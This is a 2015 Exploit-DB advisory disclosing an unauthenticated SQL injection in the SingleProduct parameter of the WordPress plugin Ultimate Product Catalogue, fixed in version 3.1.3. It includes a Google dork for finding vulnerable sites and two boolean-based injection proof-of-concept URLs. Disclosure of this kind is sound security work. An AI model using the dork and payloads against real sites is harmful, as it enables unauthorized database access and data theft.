WordPress Plugin Ultimate Product Catalogue – SQL Injection (2)

  • Author: Felipe Molina
  • Date: 2015-04-23
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/36824/
# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue WordPress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, communicated to and fixed by the vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE: Requested from MITRE but not assigned yet
# Category: webapps
    
1. Summary:

Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +59.000 downloads and +3.000 active installations.

Unauthenticated SQL injection in the "SingleProduct" parameter when a web visitor views a product published by the web administrator.
    
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3

3. Vulnerable code:

File Functions/Shortcodes.php line 779

4. Proof of concept:

http://<wordpress site>/?SingleProduct=2'+and+'a'='a
http://<wordpress site>/?SingleProduct=2'+and+'a'='b

5. Solution:

Update to version 3.1.3